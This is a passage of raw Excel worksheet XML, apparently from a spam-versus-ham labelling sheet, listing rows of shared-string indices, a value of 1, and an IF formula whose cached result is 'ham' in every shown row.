    <row r="1621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1621" t="s">
        <v>948</v>
      </c>
      <c r="B1621">
        <v>1</v>
      </c>
      <c r="C1621" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1622" t="s">
        <v>1177</v>
      </c>
      <c r="B1622">
        <v>1</v>
      </c>
      <c r="C1622" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1623" t="s">
        <v>1178</v>
      </c>
      <c r="B1623">
        <v>1</v>
      </c>
      <c r="C1623" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1624" t="s">
        <v>1179</v>
      </c>
      <c r="B1624">
        <v>1</v>
      </c>
      <c r="C1624" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1625" t="s">
        <v>1180</v>
      </c>
      <c r="B1625">
        <v>1</v>
      </c>
      <c r="C1625" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1626" t="s">
        <v>1181</v>
      </c>
      <c r="B1626">
        <v>1</v>
      </c>
      <c r="C1626" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1627" t="s">
        <v>1182</v>
      </c>
      <c r="B1627">
        <v>1</v>
      </c>
      <c r="C1627" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1628" t="s">
        <v>1183</v>
      </c>
      <c r="B1628">
        <v>1</v>
      </c>
      <c r="C1628" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1629" t="s">
        <v>1184</v>
      </c>
      <c r="B1629">
        <v>1</v>
      </c>
      <c r="C1629" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1630" t="s">
        <v>1185</v>
      </c>
      <c r="B1630">
        <v>1</v>
      </c>
      <c r="C1630" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1631" t="s">
        <v>1186</v>
      </c>
      <c r="B1631">
        <v>1</v>
      </c>
      <c r="C1631" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1632" t="s">
        <v>1187</v>
      </c>
      <c r="B1632">
        <v>1</v>
      </c>
      <c r="C1632" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1633" t="s">
        <v>995</v>
      </c>
      <c r="B1633">
        <v>1</v>
      </c>
      <c r="C1633" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1634" t="s">
        <v>1188</v>
      </c>
      <c r="B1634">
        <v>1</v>
      </c>
      <c r="C1634" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1635" t="s">
        <v>1189</v>
      </c>
      <c r="B1635">
        <v>1</v>
      </c>
      <c r="C1635" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1636" t="s">
        <v>1190</v>
      </c>
      <c r="B1636">
        <v>1</v>
      </c>
      <c r="C1636" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1637" t="s">
        <v>907</v>
      </c>
      <c r="B1637">
        <v>1</v>
      </c>
      <c r="C1637" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1638" t="s">
        <v>1191</v>
      </c>
      <c r="B1638">
        <v>1</v>
      </c>
      <c r="C1638" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1639" t="s">
        <v>21</v>
      </c>
      <c r="B1639">
        <v>1</v>
      </c>
      <c r="C1639" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1640" t="s">
        <v>1192</v>
      </c>
      <c r="B1640">
        <v>1</v>
      </c>
      <c r="C1640" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1641" t="s">
        <v>1193</v>
      </c>
      <c r="B1641">
        <v>1</v>
      </c>
      <c r="C1641" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1642" t="s">
        <v>1194</v>
      </c>
      <c r="B1642">
        <v>1</v>
      </c>
      <c r="C1642" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1643" t="s">
        <v>21</v>
      </c>
      <c r="B1643">
        <v>1</v>
      </c>
      <c r="C1643" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1644" t="s">
        <v>907</v>
      </c>
      <c r="B1644">
        <v>1</v>
      </c>
      <c r="C1644" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1645" t="s">
        <v>1195</v>
      </c>
      <c r="B1645">
        <v>1</v>
      </c>
      <c r="C1645" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1646" t="s">
        <v>1196</v>
      </c>
      <c r="B1646">
        <v>1</v>
      </c>
      <c r="C1646" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1647" t="s">
        <v>1197</v>
      </c>
      <c r="B1647">
        <v>1</v>
      </c>
      <c r="C1647" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1648" t="s">
        <v>1198</v>
      </c>
      <c r="B1648">
        <v>1</v>
      </c>
      <c r="C1648" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1649" t="s">
        <v>1199</v>
      </c>
      <c r="B1649">
        <v>1</v>
      </c>
      <c r="C1649" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1650" t="s">
        <v>1200</v>
      </c>
      <c r="B1650">
        <v>1</v>
      </c>
      <c r="C1650" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1651" t="s">
        <v>1201</v>
      </c>
      <c r="B1651">
        <v>1</v>
      </c>
      <c r="C1651" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1652" t="s">
        <v>21</v>
      </c>
      <c r="B1652">
        <v>1</v>
      </c>
      <c r="C1652" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1653" t="s">
        <v>1202</v>
      </c>
      <c r="B1653">
        <v>1</v>
      </c>
      <c r="C1653" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1654" t="s">
        <v>1203</v>
      </c>
      <c r="B1654">
        <v>1</v>
      </c>
      <c r="C1654" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1655" t="s">
        <v>1204</v>
      </c>
      <c r="B1655">
        <v>1</v>
      </c>
      <c r="C1655" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1656" t="s">
        <v>1205</v>
      </c>
      <c r="B1656">
        <v>1</v>
      </c>
      <c r="C1656" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1657" t="s">
        <v>21</v>
      </c>
      <c r="B1657">
        <v>1</v>
      </c>
      <c r="C1657" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1658" t="s">
        <v>1206</v>
      </c>
      <c r="B1658">
        <v>1</v>
      </c>
      <c r="C1658" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1659" t="s">
        <v>956</v>
      </c>
      <c r="B1659">
        <v>1</v>
      </c>
      <c r="C1659" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1660" t="s">
        <v>1207</v>
      </c>
      <c r="B1660">
        <v>1</v>
      </c>
      <c r="C1660" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1661" t="s">
        <v>1208</v>
      </c>
      <c r="B1661">
        <v>1</v>
      </c>
      <c r="C1661" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1662" t="s">
        <v>21</v>
      </c>
      <c r="B1662">
        <v>1</v>
      </c>
      <c r="C1662" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1663" t="s">
        <v>1209</v>
      </c>
      <c r="B1663">
        <v>1</v>
      </c>
      <c r="C1663" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1664" t="s">
        <v>1210</v>
      </c>
      <c r="B1664">
        <v>1</v>
      </c>
      <c r="C1664" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1665" t="s">
        <v>1211</v>
      </c>
      <c r="B1665">
        <v>1</v>
      </c>
      <c r="C1665" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1666" t="s">
        <v>1212</v>
      </c>
      <c r="B1666">
        <v>1</v>
      </c>
      <c r="C1666" t="str">
        <f t="shared" ref="C1666:C1729" si="26">IF(B1666="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1667" t="s">
        <v>1213</v>
      </c>
      <c r="B1667">
        <v>1</v>
      </c>
      <c r="C1667" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1668" t="s">
        <v>1214</v>
      </c>
      <c r="B1668">
        <v>1</v>
      </c>
      <c r="C1668" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1669" t="s">
        <v>21</v>
      </c>
      <c r="B1669">
        <v>1</v>
      </c>
      <c r="C1669" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1670" t="s">
        <v>1215</v>
      </c>
      <c r="B1670">
        <v>1</v>
      </c>
      <c r="C1670" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1671" t="s">
        <v>1216</v>
      </c>
      <c r="B1671">
        <v>1</v>
      </c>
      <c r="C1671" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1672" t="s">
        <v>21</v>
      </c>
      <c r="B1672">
        <v>1</v>
      </c>
      <c r="C1672" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1673" t="s">
        <v>1217</v>
      </c>
      <c r="B1673">
        <v>1</v>
      </c>
      <c r="C1673" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1674" t="s">
        <v>1218</v>
      </c>
      <c r="B1674">
        <v>1</v>
      </c>
      <c r="C1674" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1675" t="s">
        <v>1219</v>
      </c>
      <c r="B1675">
        <v>1</v>
      </c>
      <c r="C1675" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1676" t="s">
        <v>1220</v>
      </c>
      <c r="B1676">
        <v>1</v>
      </c>
      <c r="C1676" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1677" t="s">
        <v>1086</v>
      </c>
      <c r="B1677">
        <v>1</v>
      </c>
      <c r="C1677" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1678" t="s">
        <v>1221</v>
      </c>
      <c r="B1678">
        <v>1</v>
      </c>
      <c r="C1678" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1679" t="s">
        <v>1222</v>
      </c>
      <c r="B1679">
        <v>1</v>
      </c>
      <c r="C1679" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1680" t="s">
        <v>1222</v>
      </c>
      <c r="B1680">
        <v>1</v>
      </c>
      <c r="C1680" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1681" t="s">
        <v>1223</v>
      </c>
      <c r="B1681">
        <v>1</v>
      </c>
      <c r="C1681" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1682" t="s">
        <v>1224</v>
      </c>
      <c r="B1682">
        <v>1</v>
      </c>
      <c r="C1682" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1683" t="s">
        <v>1225</v>
      </c>
      <c r="B1683">
        <v>1</v>
      </c>
      <c r="C1683" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1684" t="s">
        <v>1226</v>
      </c>
      <c r="B1684">
        <v>1</v>
      </c>
      <c r="C1684" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1685" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1685" t="s">
        <v>21</v>
      </c>
      <c r="B1685">
        <v>1</v>
      </c>
      <c r="C1685" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1686" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1686" t="s">
        <v>1227</v>
      </c>
      <c r="B1686">
        <v>1</v>
      </c>
      <c r="C1686" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1687" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1687" t="s">
        <v>1228</v>
      </c>
      <c r="B1687">
        <v>1</v>
      </c>
      <c r="C1687" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1688" t="s">
        <v>21</v>
      </c>
      <c r="B1688">
        <v>1</v>
      </c>
      <c r="C1688" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1689" t="s">
        <v>21</v>
      </c>
      <c r="B1689">
        <v>1</v>
      </c>
      <c r="C1689" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1690" t="s">
        <v>21</v>
      </c>
      <c r="B1690">
        <v>1</v>
      </c>
      <c r="C1690" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1691" t="s">
        <v>1229</v>
      </c>
      <c r="B1691">
        <v>1</v>
      </c>
      <c r="C1691" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1692" t="s">
        <v>1230</v>
      </c>
      <c r="B1692">
        <v>1</v>
      </c>
      <c r="C1692" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1693" t="s">
        <v>1182</v>
      </c>
      <c r="B1693">
        <v>1</v>
      </c>
      <c r="C1693" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1694" t="s">
        <v>1231</v>
      </c>
      <c r="B1694">
        <v>1</v>
      </c>
      <c r="C1694" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1695" t="s">
        <v>1232</v>
      </c>
      <c r="B1695">
        <v>1</v>
      </c>
      <c r="C1695" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1696" t="s">
        <v>21</v>
      </c>
      <c r="B1696">
        <v>1</v>
      </c>
      <c r="C1696" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1697" t="s">
        <v>1233</v>
      </c>
      <c r="B1697">
        <v>1</v>
      </c>
      <c r="C1697" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1698" t="s">
        <v>1234</v>
      </c>
      <c r="B1698">
        <v>1</v>
      </c>
      <c r="C1698" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1699" t="s">
        <v>907</v>
      </c>
      <c r="B1699">
        <v>1</v>
      </c>
      <c r="C1699" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1700" t="s">
        <v>1235</v>
      </c>
      <c r="B1700">
        <v>1</v>
      </c>
      <c r="C1700" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1701" t="s">
        <v>1236</v>
      </c>
      <c r="B1701">
        <v>1</v>
      </c>
      <c r="C1701" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1702" t="s">
        <v>21</v>
      </c>
      <c r="B1702">
        <v>1</v>
      </c>
      <c r="C1702" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1703" t="s">
        <v>1233</v>
      </c>
      <c r="B1703">
        <v>1</v>
      </c>
      <c r="C1703" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1704" t="s">
        <v>1237</v>
      </c>
      <c r="B1704">
        <v>1</v>
      </c>
      <c r="C1704" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1705" t="s">
        <v>1238</v>
      </c>
      <c r="B1705">
        <v>1</v>
      </c>
      <c r="C1705" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1706" t="s">
        <v>21</v>
      </c>
      <c r="B1706">
        <v>1</v>
      </c>
      <c r="C1706" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1707" t="s">
        <v>1232</v>
      </c>
      <c r="B1707">
        <v>1</v>
      </c>
      <c r="C1707" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1708" t="s">
        <v>1239</v>
      </c>
      <c r="B1708">
        <v>1</v>
      </c>
      <c r="C1708" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1709" t="s">
        <v>1240</v>
      </c>
      <c r="B1709">
        <v>1</v>
      </c>
      <c r="C1709" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1710" t="s">
        <v>1241</v>
      </c>
      <c r="B1710">
        <v>1</v>
      </c>
      <c r="C1710" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1711" t="s">
        <v>21</v>
      </c>
      <c r="B1711">
        <v>1</v>
      </c>
      <c r="C1711" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1712" t="s">
        <v>27</v>
      </c>
      <c r="B1712">
        <v>1</v>
      </c>
      <c r="C1712" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1713" t="s">
        <v>1242</v>
      </c>
      <c r="B1713">
        <v>1</v>
      </c>
      <c r="C1713" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1714" t="s">
        <v>1243</v>
      </c>
      <c r="B1714">
        <v>1</v>
      </c>
      <c r="C1714" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1715" t="s">
        <v>21</v>
      </c>
      <c r="B1715">
        <v>1</v>
      </c>
      <c r="C1715" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1716" t="s">
        <v>1244</v>
      </c>
      <c r="B1716">
        <v>1</v>
      </c>
      <c r="C1716" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1717" t="s">
        <v>21</v>
      </c>
      <c r="B1717">
        <v>1</v>
      </c>
      <c r="C1717" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1718" t="s">
        <v>1245</v>
      </c>
      <c r="B1718">
        <v>1</v>
      </c>
      <c r="C1718" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1719" t="s">
        <v>1246</v>
      </c>
      <c r="B1719">
        <v>1</v>
      </c>
      <c r="C1719" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1720" t="s">
        <v>1247</v>
      </c>
      <c r="B1720">
        <v>1</v>
      </c>
      <c r="C1720" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1721" t="s">
        <v>1248</v>
      </c>
      <c r="B1721">
        <v>1</v>
      </c>
      <c r="C1721" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1722" t="s">
        <v>1249</v>
      </c>
      <c r="B1722">
        <v>1</v>
      </c>
      <c r="C1722" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1723" t="s">
        <v>1250</v>
      </c>
      <c r="B1723">
        <v>1</v>
      </c>
      <c r="C1723" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1724" t="s">
        <v>1251</v>
      </c>
      <c r="B1724">
        <v>1</v>
      </c>
      <c r="C1724" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1725" t="s">
        <v>234</v>
      </c>
      <c r="B1725">
        <v>1</v>
      </c>
      <c r="C1725" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1726" t="s">
        <v>1252</v>
      </c>
      <c r="B1726">
        <v>1</v>
      </c>
      <c r="C1726" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1727" t="s">
        <v>21</v>
      </c>
      <c r="B1727">
        <v>1</v>
      </c>
      <c r="C1727" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1728" t="s">
        <v>21</v>
      </c>
      <c r="B1728">
        <v>1</v>
      </c>
      <c r="C1728" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1729" t="s">
        <v>21</v>
      </c>
      <c r="B1729">
        <v>1</v>
      </c>
      <c r="C1729" t="str">
        <f t="shared" si="26"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1730" t="s">
        <v>1253</v>
      </c>
      <c r="B1730">
        <v>1</v>
      </c>
      <c r="C1730" t="str">
        <f t="shared" ref="C1730:C1793" si="27">IF(B1730="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1731" t="s">
        <v>1254</v>
      </c>
      <c r="B1731">
        <v>1</v>
      </c>
      <c r="C1731" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1732" t="s">
        <v>1255</v>
      </c>
      <c r="B1732">
        <v>1</v>
      </c>
      <c r="C1732" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1733" t="s">
        <v>1256</v>
      </c>
      <c r="B1733">
